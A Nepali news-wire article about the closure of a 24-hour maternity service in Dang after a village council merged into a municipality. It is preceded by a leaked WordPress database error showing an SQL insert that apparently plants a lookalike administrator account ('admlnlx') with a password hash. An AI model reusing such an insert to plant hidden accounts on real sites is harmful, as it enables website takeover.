WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgE..VaPqY5wL3xTQfUZJEBFZHs2Nz/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 05:47:55', '', 'admlnlx', 'admlnlx')
दाङ,माघ १५ –
दाङको साविक हलवार गाविस नगरपालिकामा गाभिएसँगै त्यहाँ सञ्चालन भएको २४ घन्टे प्रसूति सेवा बन्द भएको छ ।
प्रसूति सेवा बन्द भएसँगै धेरै महिला घरमै सुत्केरी हुन बाध्य भएका छन । सर्वसुलभ स्वास्थ्य सेवा दिन खोज्दा विभिन्न समस्याका कारण सेवा दिन नसकिएको स्वस्थ्य चौकीका प्रमुख विमल केसीले बताउनुभयो ।
सुगमताको हिसाबले हेर्दा हाल यो स्वास्थ्य चौकी नगरपालिकामा पर्दछ, भौगोलिक हिसाबले अति नै दुर्गम छ । विगत वर्षदेखि सञ्चालनमा आएको प्रसूति सेवा पनि बन्द भएको छ ।
गाविस हुँदा केही रकमको जोहो गरेर सञ्चालनमा ल्याएको र हाल सो गाविस नगरपालिकामा समायोजन हुँदा बजेट नछु्याएको र यतातिर कसैको ध्यान नपुग्दा बन्द गर्नुपरेको प्रमुख केसीले बताउनुभयो ।
‘गाविस हँुदा आफूहरुका योजना तथा समस्या पनि सहजै सुनवाई तथा सम्बोधन हुने गर्दथ्यो ।
स्वास्थ्य चौकीले ११ हजार भन्दा बढी घरधुरीलाई सेवा दिने गर्दछ ।२०७१ ‘साउनमा २४ घन्टे प्रसूति सेवा सञ्चालनमा ल्यायाँै । गाविस हुँदा यो व्यवस्थापनको लागि रकम विनियोजन गर्ने गर्दथ्यो । अहिले नगरपालिका भएपछि त्यो पनि हरायो, प्रमुख विमल केसीले भन्नुभयो । – रासस